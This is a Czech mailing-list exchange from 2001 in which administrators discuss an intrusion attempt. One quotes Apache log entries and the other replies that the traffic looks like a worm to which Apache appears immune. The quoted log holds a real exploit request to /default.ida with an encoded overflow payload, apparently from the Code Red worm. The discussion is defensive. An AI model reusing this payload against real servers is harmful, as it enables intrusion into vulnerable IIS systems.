pokus o prunik

Pátek Červenec 20 11:57:01 CEST 2001

Miroslav Geisselreiter wrote:
> logy apache: access.log:
> 
> 64.156.242.30 - - [19/Jul/2001:18:36:24 +0200] "GET
> /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
> NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
> NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
> NNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%
> u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
> HTTP/1.0" 400 333
> 216.55.161.166 - - [19/Jul/2001:19:16:53 +0200] "GET
> 
> Znáte někdo tento exploit, poradíte, co proti němu mohu dělat? Děkuji za
> rady a tipy.
> 

Na nas web server to vcera v noci taky nekdo zkusil. Cca 20 requestu,
kazdou ctvrthodinu cca jeden, pokazde jine source IP. Vecer spis z USA,
k ranu z Koree apod. Vypada to, ze je to cerv. Apache vypada, ze je
imunni.

                                    Radek Svoboda
                                    Neovision s.r.o., Prague
                                    svoboda na neovision.cz
                                    http://www.neovision.cz